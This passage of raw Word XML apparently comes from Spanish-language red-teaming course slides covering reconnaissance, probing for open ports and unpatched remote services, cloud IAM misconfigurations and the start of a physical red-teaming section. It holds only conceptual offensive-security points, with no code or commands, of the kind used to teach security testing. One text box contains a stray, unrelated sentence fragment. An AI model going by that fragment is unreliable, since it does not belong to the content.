        <w:t xml:space="preserve"> la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>empresa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E1C776" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BADB0B6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1419"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1419" w:right="446"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El mapeo de los usuarios con sus sistemas asignados, la arquitectura de red interna debe estar clara antes de la fase de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516134D2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="138"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19343C20" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1419"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1419" w:right="2158"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Buscaremos puertos TCP/UDP abiertos que tengan algunos servicios de acceso remoto, servicios sin parches/vulnerables, para mantener el punto de apoyo inicial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F35751" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2969810A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1419"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1419" w:right="796"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El software más reciente/inestable al que se puede acceder a través de la web o la red tiene una mayor probabilidad de vulnerabilidades incorporadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F882277"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100" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="314" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349F1429" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1540"/>
        </w:tabs>
        <w:spacing w:before="14"/>
        <w:ind w:left="1540" w:hanging="1195"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485380096" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="538D216D" wp14:editId="684821F2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6027420</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5587</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5821680" cy="4392167"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>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35" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5821680" cy="4392167"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Tecnología en la nube:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D53612" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="165"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F882DD2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1386"/>
          <w:tab w:val="left" w:pos="1423"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:ind w:left="1386" w:right="8756" w:hanging="322"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La tecnología en la nube tiene disponibilidad bajo demanda con recursos informáticos muy factibles y, por lo tanto, es la primera opción de las organizaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652D6F6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="430D7701" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="114"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769B40D2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1425"/>
          <w:tab w:val="left" w:pos="16500"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1425" w:right="1573"/>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5379584" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="324B2877" wp14:editId="085C381F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5936753</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>27158</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4472940" cy="63436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2940" cy="634365"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="274F299E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="455" w:lineRule="exact"/>
                              <w:ind w:left="130"/>
                              <w:rPr>
                                <w:sz w:val="48"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>(</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>AWS),</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> Microsoft </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Azure </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="48"/>
                              </w:rPr>
                              <w:t>y Google</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="22FC6040" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:line="543" w:lineRule="exact"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Es decir, que la mayoría de las personas que se encuentran en el centro de la ciudad de</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="324B2877" id="Textbox 312" o:spid="_x0000_s1159" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:467.45pt;margin-top:2.15pt;width:352.2pt;height:49.95pt;z-index:-1793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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="274F299E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="455" w:lineRule="exact"/>
                        <w:ind w:left="130"/>
                        <w:rPr>
                          <w:sz w:val="48"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>(</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>AWS),</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> Microsoft </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Azure </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>y Google</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="22FC6040" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:line="543" w:lineRule="exact"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Es decir, que la mayoría de las personas que se encuentran en el centro de la ciudad de</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servicios en la nube como Amazon Web Services</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Plataforma en la nube (</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>GCP (en inglés)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">) se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>despliegan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>grandes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>escalas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D12A1DD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED87294" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="171"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B062B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1425"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1425" w:right="619"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Un pequeño error o una mala configuración de los administradores dejan una gran puerta abierta para los atacantes, por ejemplo, la gestión de identidades y accesos (</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>) de los empleados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C712B8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5525DE55" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="116"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CF3347" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1424"/>
        </w:tabs>
        <w:ind w:left="1424" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La red local de la organización está conectada directamente con los servicios en la nube (puerta a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEF00D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId136"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="200" w:right="0" w:bottom="740" w:left="0" w:header="0" w:footer="549" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFEF31E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1652"/>
        </w:tabs>
        <w:spacing w:line="572" w:lineRule="exact"/>
        <w:ind w:left="1652" w:hanging="1194"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Red Teaming Físico:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C1B1A6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="320"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C8E893" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="819"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="819" w:right="770" w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>En lugar de depender de enfoques basados en herramientas, un Red Team desarrolla situaciones de ataque únicas aprovechando los procedimientos manuales y automatizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308F1CE1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="339"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D53B688" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="819"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="819" w:right="1972" w:hanging="361"/>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5380608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54E1BD66" wp14:editId="732BDE79">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7629143</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>125392</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3761740" cy="3808729"/>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3808729"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3761740" cy="3808729"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="316" name="Image 316"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId137" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3761232" cy="3808603"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="317" name="Image 317"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId138" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="195071" y="195135"/>
                            <a:ext cx="3191255" cy="3238500"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="182BA488" id="Group 315" o:spid="_x0000_s1026" style="position:absolute;margin-left:600.7pt;margin-top:9.85pt;width:296.2pt;height:299.9pt;z-index:-17935872;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="37617,380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">
                <v:shape id="Image 316" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:37612;height:3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">
                  <v:imagedata r:id="rId139" o:title=""/>
                </v:shape>
                <v:shape id="Image 317" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1950;top:1951;width:31913;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">
                  <v:imagedata r:id="rId140" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
